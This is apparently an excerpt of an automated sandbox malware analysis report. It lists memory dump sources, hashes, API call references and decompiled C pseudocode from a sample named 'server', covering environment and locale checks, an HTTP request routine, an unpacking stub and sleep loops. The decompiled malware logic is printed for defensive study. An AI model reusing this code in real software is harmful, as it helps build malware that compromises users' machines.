                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 3012371009-0
                • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
                • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E022251D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                				void* __esi;
                				long _t10;
                				void* _t18;
                				void* _t22;
                
                				_t9 = __eax;
                				_t22 = __eax;
                				if(_a4 != 0 && E02222058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                					L9:
                					return GetLastError();
                				}
                				_t10 = E02227B83(_t9, _t18, _t22, _a8); // executed
                				if(_t10 == 0) {
                					ResetEvent( *(_t22 + 0x1c));
                					ResetEvent( *(_t22 + 0x20));
                					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                						SetEvent( *(_t22 + 0x1c));
                						goto L7;
                					} else {
                						_t10 = GetLastError();
                						if(_t10 == 0x3e5) {
                							L7:
                							_t10 = 0;
                						}
                					}
                				}
                				if(_t10 == 0xffffffff) {
                					goto L9;
                				}
                				return _t10;
                			}

                0x022251d8
                0x022251e5
                0x022251e7
                0x0222524a
                0x00000000
                0x0222524a
                0x022251ff
                0x02225206
                0x02225212
                0x02225217
                0x0222522d
                0x0222523d
                0x00000000
                0x0222522f
                0x0222522f
                0x02225236
                0x02225243
                0x02225243
                0x02225243
                0x02225236
                0x0222522d
                0x02225248
                0x00000000
                0x00000000
                0x0222524e

                APIs
                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,022221E7,?,?,74CF81D0,00000000), ref: 02225212
                • ResetEvent.KERNEL32(?), ref: 02225217
                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02225224
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02223F34,00000000,?,?), ref: 0222522F
                • GetLastError.KERNEL32(?,?,00000102,022221E7,?,?,74CF81D0,00000000), ref: 0222524A
                  • Part of subcall function 02222058: lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,022251F7,?,?,?,?,00000102,022221E7,?,?,74CF81D0), ref: 02222064
                  • Part of subcall function 02222058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,022251F7,?,?,?,?,00000102,022221E7,?), ref: 022220C2
                  • Part of subcall function 02222058: lstrcpy.KERNEL32(00000000,00000000), ref: 022220D2
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02223F34,00000000,?), ref: 0222523D
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                • String ID:
                • API String ID: 3739416942-0
                • Opcode ID: 04586817cc830329435cdfcd53a76745fe90763a7b0f30d1f352fe251df5c869
                • Instruction ID: 3eb3ab0b348eabda375a5b653c33806b3960e85e9ac4cf62ba56cb79755a5fe0
                • Opcode Fuzzy Hash: 04586817cc830329435cdfcd53a76745fe90763a7b0f30d1f352fe251df5c869
                • Instruction Fuzzy Hash: 9101AD31120222BAD7306AE0EC48F5BB7A9BF48324F608B24F491D10E4D763E96CDA20
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E02222523(signed int __edx) {
                				signed int _v8;
                				long _v12;
                				CHAR* _v16;
                				long _v20;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t21;
                				CHAR* _t22;
                				CHAR* _t25;
                				intOrPtr _t26;
                				void* _t27;
                				void* _t31;
                				intOrPtr _t32;
                				void* _t33;
                				CHAR* _t37;
                				CHAR* _t43;
                				CHAR* _t44;
                				CHAR* _t45;
                				void* _t50;
                				void* _t52;
                				signed char _t57;
                				intOrPtr _t59;
                				signed int _t60;
                				void* _t64;
                				CHAR* _t68;
                				CHAR* _t69;
                				char* _t70;
                				void* _t71;
                
                				_t62 = __edx;
                				_v20 = 0;
                				_v8 = 0;
                				_v12 = 0;
                				_t21 = E02224520();
                				if(_t21 != 0) {
                					_t60 =  *0x222a2fc; // 0x2000000a
                					_t56 = (_t60 & 0xf0000000) + _t21;
                					 *0x222a2fc = (_t60 & 0xf0000000) + _t21;
                				}
                				_t22 =  *0x222a178(0, 2); // executed
                				_v16 = _t22;
                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                					_t25 = E02223037( &_v8,  &_v20); // executed
                					_t55 = _t25;
                					_t26 =  *0x222a348; // 0x9ad5a8
                					if( *0x222a2fc > 5) {
                						_t8 = _t26 + 0x222b51d; // 0x4d283a53
                						_t27 = _t8;
                					} else {
                						_t7 = _t26 + 0x222b9db; // 0x44283a44
                						_t27 = _t7;
                					}
                					E02224332(_t27, _t27);
                					_t31 = E0222415A(_t62,  &_v20,  &_v12); // executed
                					if(_t31 == 0) {
                						CloseHandle(_v20);
                					}
                					_t64 = 5;
                					if(_t55 != _t64) {
                						_t32 = E022227A0();
                						 *0x222a310 =  *0x222a310 ^ 0x81bbe65d;
                						 *0x222a36c = _t32;
                						_t33 = E022233DC(0x60);
                						 *0x222a3cc = _t33;
                						__eflags = _t33;
                						if(_t33 == 0) {
                							_push(8);
                							_pop(0);
                						} else {
                							memset(_t33, 0, 0x60);
                							_t50 =  *0x222a3cc; // 0x2bd9600
                							_t71 = _t71 + 0xc;
                							__imp__(_t50 + 0x40);
                							_t52 =  *0x222a3cc; // 0x2bd9600
                							 *_t52 = 0x222b142;
                						}
                						_t55 = 0;
                						__eflags = 0;
                						if(0 == 0) {
                							_t37 = RtlAllocateHeap( *0x222a2d8, 0, 0x43);
                							 *0x222a368 = _t37;
                							__eflags = _t37;
                							if(_t37 == 0) {
                								_push(8);
                								_pop(0);
                							} else {
                								_t57 =  *0x222a2fc; // 0x2000000a
                								_t62 = _t57 & 0x000000ff;
                								_t59 =  *0x222a348; // 0x9ad5a8
                								_t13 = _t59 + 0x222b74a; // 0x697a6f4d
                								_t56 = _t13;
                								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x222927b);
                							}
                							_t55 = 0;
                							__eflags = 0;
                							if(0 == 0) {
                								asm("sbb eax, eax");
                								E02223BD3( ~_v8 &  *0x222a310,  &E0222A00C); // executed
                								_t43 = E02221D8A(0, _t56, _t62, _t64,  &E0222A00C); // executed
                								_t55 = _t43;
                								__eflags = _t55;
                								if(_t55 != 0) {
                									goto L30;
                								}
                								_t44 = E02226EA3(_t62); // executed
                								__eflags = _t44;
                								if(_t44 != 0) {
                									__eflags = _v8;
                									_t68 = _v12;
                									if(_v8 != 0) {
                										L29:
                										_t45 = E02226815(_t62, _t68, _v8); // executed
                										_t55 = _t45;
                										goto L30;
                									}
                									__eflags = _t68;
                									if(__eflags == 0) {
                										goto L30;
                									}
                									_t55 = E02225C31(__eflags,  &(_t68[4]));
                									__eflags = _t55;
                									if(_t55 == 0) {
                										goto L30;
                									}
                									goto L29;
                								}
                								_t55 = 8;
                							}
                						}
                					} else {
                						_t69 = _v12;
                						if(_t69 == 0) {
                							L30:
                							if(_v16 == 0 || _v16 == 1) {
                								 *0x222a17c();
                							}
                							goto L34;
                						}
                						_t70 =  &(_t69[4]);
                						do {
                						} while (E022223C4(_t64, _t70, 0, 1) == 0x4c7);
                					}
                					goto L30;
                				} else {
                					_t55 = _t22;
                					L34:
                					return _t55;
                				}
                			}

                0x02222523
                0x0222252d
                0x02222530
                0x02222533
                0x02222536
                0x0222253d
                0x0222253f
                0x0222254b
                0x0222254d
                0x0222254d
                0x02222556
                0x0222255c
                0x02222561
                0x0222257b
                0x02222587
                0x02222589
                0x0222258e
                0x02222598
                0x02222598
                0x02222590
                0x02222590
                0x02222590
                0x02222590
                0x0222259f
                0x022225ac
                0x022225b3
                0x022225b8
                0x022225b8
                0x022225c1
                0x022225c4
                0x022225ea
                0x022225ef
                0x022225fb
                0x02222600
                0x02222605
                0x0222260a
                0x0222260c
                0x02222638
                0x0222263a
                0x0222260e
                0x02222612
                0x02222617
                0x0222261c
                0x02222623
                0x02222629
                0x0222262e
                0x02222634
                0x0222263b
                0x0222263d
                0x0222263f
                0x0222264e
                0x02222654
                0x02222659
                0x0222265b
                0x0222268b
                0x0222268d
                0x0222265d
                0x0222265d
                0x02222663
                0x02222670
                0x02222676
                0x02222676
                0x0222267e
                0x02222687
                0x0222268e
                0x02222690
                0x02222692
                0x02222699
                0x022226a6
                0x022226ab
                0x022226b0
                0x022226b2
                0x022226b4
                0x00000000
                0x00000000
                0x022226b6
                0x022226bb
                0x022226bd
                0x022226c4
                0x022226c8
                0x022226cb
                0x022226e0
                0x022226e4
                0x022226e9
                0x00000000
                0x022226e9
                0x022226cd
                0x022226cf
                0x00000000
                0x00000000
                0x022226da
                0x022226dc
                0x022226de
                0x00000000
                0x00000000
                0x00000000
                0x022226de
                0x022226c1
                0x022226c1
                0x02222692
                0x022225c6
                0x022225c6
                0x022225cb
                0x022226eb
                0x022226f0
                0x022226f8
                0x022226f8
                0x00000000
                0x022226f0
                0x022225d1
                0x022225d4
                0x022225de
                0x022225e5
                0x00000000
                0x02222700
                0x02222700
                0x02222703
                0x02222707
                0x02222707

                APIs
                  • Part of subcall function 02224520: GetModuleHandleA.KERNEL32(4C44544E,00000000,0222253B,00000001), ref: 0222452F
                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 022225B8
                  • Part of subcall function 022227A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 022227C4
                  • Part of subcall function 022227A0: wsprintfA.USER32 ref: 02222828
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • memset.NTDLL ref: 02222612
                • RtlInitializeCriticalSection.NTDLL(02BD95C0), ref: 02222623
                  • Part of subcall function 02225C31: memset.NTDLL ref: 02225C4B
                  • Part of subcall function 02225C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02225C91
                  • Part of subcall function 02225C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 02225C9C
                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 0222264E
                • wsprintfA.USER32 ref: 0222267E
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
                • String ID:
                • API String ID: 1825273115-0
                • Opcode ID: b263e61150fcdb553f5c8d4fb2c6ffb4fc2c048576a143663bfea8d860e9137e
                • Instruction ID: 7d837f4a86b7da5d5033bd3345513513dd1177c095b8f8b3d24d096cbf63f870
                • Opcode Fuzzy Hash: b263e61150fcdb553f5c8d4fb2c6ffb4fc2c048576a143663bfea8d860e9137e
                • Instruction Fuzzy Hash: 0551C771E60236FBDB20AFE4ED58FAE33A8AB04704F115A15E901EB148D7B7995C8F50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E02227040(signed int __eax, signed int _a4, signed int _a8) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				signed int _v20;
                				intOrPtr _t81;
                				char _t83;
                				signed int _t90;
                				signed int _t97;
                				signed int _t99;
                				char _t101;
                				unsigned int _t102;
                				intOrPtr _t103;
                				char* _t107;
                				signed int _t110;
                				signed int _t113;
                				signed int _t118;
                				signed int _t122;
                				intOrPtr _t124;
                
                				_t102 = _a8;
                				_t118 = 0;
                				_v20 = __eax;
                				_t122 = (_t102 >> 2) + 1;
                				_v8 = 0;
                				_a8 = 0;
                				_t81 = E022233DC(_t122 << 2);
                				_v16 = _t81;
                				if(_t81 == 0) {
                					_push(8);
                					_pop(0);
                					L37:
                					return 0;
                				}
                				_t107 = _a4;
                				_a4 = _t102;
                				_t113 = 0;
                				while(1) {
                					_t83 =  *_t107;
                					if(_t83 == 0) {
                						break;
                					}
                					if(_t83 == 0xd || _t83 == 0xa) {
                						if(_t118 != 0) {
                							if(_t118 > _v8) {
                								_v8 = _t118;
                							}
                							_a8 = _a8 + 1;
                							_t118 = 0;
                						}
                						 *_t107 = 0;
                						goto L16;
                					} else {
                						if(_t118 != 0) {
                							L10:
                							_t118 = _t118 + 1;
                							L16:
                							_t107 = _t107 + 1;
                							_t15 =  &_a4;
                							 *_t15 = _a4 - 1;
                							if( *_t15 != 0) {
                								continue;
                							}
                							break;
                						}
                						if(_t113 == _t122) {
                							L21:
                							if(_a8 <= 0x20) {
                								_push(0xb);
                								L34:
                								_pop(0);
                								L35:
                								E022261DA(_v16);
                								goto L37;
                							}
                							_t24 = _v8 + 5; // 0xcdd8d2f8
                							_t103 = E022233DC((_v8 + _t24) * _a8 + 4);
                							if(_t103 == 0) {
                								_push(8);
                								goto L34;
                							}
                							_t90 = _a8;
                							_a4 = _a4 & 0x00000000;
                							_v8 = _v8 & 0x00000000;
                							_t124 = _t103 + _t90 * 4;
                							if(_t90 <= 0) {
                								L31:
                								 *0x222a318 = _t103;
                								goto L35;
                							}
                							do {
                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                								_v12 = _v12 & 0x00000000;
                								if(_a4 <= 0) {
                									goto L30;
                								} else {
                									goto L26;
                								}
                								while(1) {
                									L26:
                									_t99 = _v12;
                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                									if(_t99 == 0) {
                										break;
                									}
                									_v12 = _v12 + 1;
                									if(_v12 < _a4) {
                										continue;
                									}
                									goto L30;
                								}
                								_v8 = _v8 - 1;
                								L30:
                								_t97 = _a4;
                								_a4 = _a4 + 1;
                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                								__imp__(_t124);
                								_v8 = _v8 + 1;
                								_t124 = _t124 + _t97 + 1;
                							} while (_v8 < _a8);
                							goto L31;
                						}
                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                						_t101 = _t83;
                						if(_t83 - 0x61 <= 0x19) {
                							_t101 = _t101 - 0x20;
                						}
                						 *_t107 = _t101;
                						_t113 = _t113 + 1;
                						goto L10;
                					}
                				}
                				if(_t118 != 0) {
                					if(_t118 > _v8) {
                						_v8 = _t118;
                					}
                					_a8 = _a8 + 1;
                				}
                				goto L21;
                			}

                APIs
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • lstrcpy.KERNEL32(43175AC4,00000020), ref: 0222713D
                • lstrcat.KERNEL32(43175AC4,00000020), ref: 02227152
                • lstrcmp.KERNEL32(00000000,43175AC4), ref: 02227169
                • lstrlen.KERNEL32(43175AC4), ref: 0222718D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                • String ID:
                • API String ID: 3214092121-3916222277
                • Opcode ID: 222d111b1f2c83bee0bb33b50ee0856ec4a4935c70f974f0e0789e965325d99f
                • Instruction ID: 2f155e330595300a42eeb80060213698d8b6fcd5d8899e0e2c87088becd83e19
                • Opcode Fuzzy Hash: 222d111b1f2c83bee0bb33b50ee0856ec4a4935c70f974f0e0789e965325d99f
                • Instruction Fuzzy Hash: C451D171A14229FBDF20CFD9C4846ADFBB6FF41304F15805AE8149B219C772AB59CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			_entry_() {
                				void* _t1;
                				int _t4;
                				int _t6;
                
                				_t6 = 0;
                				_t1 = HeapCreate(0, 0x400000, 0); // executed
                				 *0x404160 = _t1;
                				if(_t1 != 0) {
                					 *0x404170 = GetModuleHandleA(0);
                					GetCommandLineW(); // executed
                					_t4 = E004019F1(); // executed
                					_t6 = _t4;
                					HeapDestroy( *0x404160);
                				}
                				ExitProcess(_t6);
                			}

                APIs
                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
                • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
                • GetCommandLineW.KERNEL32 ref: 00401E06
                  • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
                  • Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                  • Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                  • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                  • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                  • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
                  • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
                • HeapDestroy.KERNEL32 ref: 00401E19
                • ExitProcess.KERNEL32 ref: 00401E20
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
                • String ID:
                • API String ID: 1863574965-0
                • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
                • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0050024D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID: cess$kernel32.dll
                • API String ID: 4275171209-1230238691
                • Opcode ID: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
                • Instruction ID: b4564d959a36bf7a2559786a77b310a39ab62a0683976f7b6e2d52c39442a703
                • Opcode Fuzzy Hash: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
                • Instruction Fuzzy Hash: 8DC19BB5D01229EFDF60CFA8D985BDDBBB5BF08304F108099E548A7292DB319A94DF11
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(80000002), ref: 022243B5
                • SysAllocString.OLEAUT32(02224D42), ref: 022243F9
                • SysFreeString.OLEAUT32(00000000), ref: 0222440D
                • SysFreeString.OLEAUT32(00000000), ref: 0222441B
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: d26dad274545c093d5c79ec991d6136c402caeeba3052225ec2215cc34ca0d46
                • Instruction ID: c53d8b286489c18ceb4d51a0ce8860280d5d6b88a144f36e6f0e562463e55913
                • Opcode Fuzzy Hash: d26dad274545c093d5c79ec991d6136c402caeeba3052225ec2215cc34ca0d46
                • Instruction Fuzzy Hash: E5314D71910209FFCB15DFD8D4C49AE7BB9FF08304B21842EF906AB250D7729689CB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E0222213E(void* __ecx, intOrPtr _a4) {
                				struct _FILETIME _v12;
                				int _t13;
                				signed int _t16;
                				void* _t17;
                				signed int _t18;
                				unsigned int _t22;
                				void* _t30;
                				signed int _t34;
                
                				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                				asm("stosd");
                				do {
                					_t13 = SwitchToThread();
                					GetSystemTimeAsFileTime( &_v12);
                					_t22 = _v12.dwHighDateTime;
                					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                					_push(0);
                					_push(0x13);
                					_push(_t22 >> 5);
                					_push(_t16);
                					L02228436();
                					_t34 = _t16 + _t13;
                					_t17 = E02226269(_a4, _t34);
                					_t30 = _t17;
                					_t18 = 3;
                					Sleep(_t18 << (_t34 & 0x00000007)); // executed
                				} while (_t30 == 1);
                				return _t30;
                			}

                APIs
                • SwitchToThread.KERNEL32(?,00000001,?,?,?,02225044,?,?), ref: 0222214F
                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,02225044,?,?), ref: 0222215B
                • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 02222174
                  • Part of subcall function 02226269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 02226308
                • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,02225044,?,?), ref: 02222193
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                • String ID:
                • API String ID: 1610602887-0
                • Opcode ID: 35253a2162a03fec02c16d171c5a9cc2094ca628d710dd03c745cc370eaf0fed
                • Instruction ID: 672af5fcef6ec0f14b138a6b9b46c9b432ffccd98f1a6d323a7647138b6a9b0e
                • Opcode Fuzzy Hash: 35253a2162a03fec02c16d171c5a9cc2094ca628d710dd03c745cc370eaf0fed
                • Instruction Fuzzy Hash: C4F0F477F502187BD7149AE0DC0DFEF76B9DB80360F110524E601E7340EAB59A44CAA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 50%
                			E02225364(void** __esi) {
                				intOrPtr _v0;
                				intOrPtr _t4;
                				intOrPtr _t6;
                				void* _t8;
                				void* _t9;
                				intOrPtr _t10;
                				void* _t11;
                				void** _t13;
                
                				_t13 = __esi;
                				_t4 =  *0x222a3cc; // 0x2bd9600
                				__imp__(_t4 + 0x40);
                				while(1) {
                					_t6 =  *0x222a3cc; // 0x2bd9600
                					_t1 = _t6 + 0x58; // 0x0
                					if( *_t1 == 0) {
                						break;
                					}
                					Sleep(0xa);
                				}
                				_t8 =  *_t13;
                				if(_t8 != 0 && _t8 != 0x222a030) {
                					HeapFree( *0x222a2d8, 0, _t8);
                				}
                				_t9 = E022212C6(_v0, _t13); // executed
                				_t13[1] = _t9;
                				_t10 =  *0x222a3cc; // 0x2bd9600
                				_t11 = _t10 + 0x40;
                				__imp__(_t11);
                				return _t11;
                			}

                APIs
                • RtlEnterCriticalSection.NTDLL(02BD95C0), ref: 0222536D
                • Sleep.KERNEL32(0000000A), ref: 02225377
                • HeapFree.KERNEL32(00000000,00000000), ref: 0222539F
                • RtlLeaveCriticalSection.NTDLL(02BD95C0), ref: 022253BB
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID:
                • API String ID: 58946197-0
                • Opcode ID: a9a2e0ec10755a5b0456770cf4e8952d5120066252025768bdcf13c5da3263b3
                • Instruction ID: f272b38ecdb980ab2de24ffd045df37ef8df21efe8286e9171e295dc1fb616ee
                • Opcode Fuzzy Hash: a9a2e0ec10755a5b0456770cf4e8952d5120066252025768bdcf13c5da3263b3
                • Instruction Fuzzy Hash: 2BF03A31A50212BBEB349BE4EE4CF163BA5AB04340B12A800B505CA665C763D8BCCA14
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02225251(void* __edx) {
                				void* _v8;
                				int _v12;
                				WCHAR* _v16;
                				void* __edi;
                				void* __esi;
                				void* _t23;
                				intOrPtr _t24;
                				void* _t26;
                				intOrPtr _t32;
                				intOrPtr _t35;
                				intOrPtr _t38;
                				intOrPtr _t42;
                				void* _t45;
                				void* _t50;
                				void* _t52;
                
                				_t50 = __edx;
                				_v12 = 0;
                				_t23 = E02226ADC(0,  &_v8); // executed
                				if(_t23 != 0) {
                					_v8 = 0;
                				}
                				_t24 =  *0x222a348; // 0x9ad5a8
                				_t4 = _t24 + 0x222bc70; // 0x2bd9218
                				_t5 = _t24 + 0x222bb60; // 0x4f0053
                				_t26 = E022233F1( &_v16, _v8, _t5, _t4); // executed
                				_t45 = _t26;
                				if(_t45 == 0) {
                					StrToIntExW(_v16, 0,  &_v12);
                					_t45 = 8;
                					if(_v12 < _t45) {
                						_t45 = 1;
                						__eflags = 1;
                					} else {
                						_t32 =  *0x222a348; // 0x9ad5a8
                						_t11 = _t32 + 0x222bcc8; // 0x2bd9270
                						_t48 = _t11;
                						_t12 = _t32 + 0x222bb60; // 0x4f0053
                						_t52 = E02225DE4(_t11, _t12, _t11);
                						_t59 = _t52;
                						if(_t52 != 0) {
                							_t35 =  *0x222a348; // 0x9ad5a8
                							_t13 = _t35 + 0x222bcf0; // 0x30314549
                							if(E02225157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                								_t61 =  *0x222a2fc - 6;
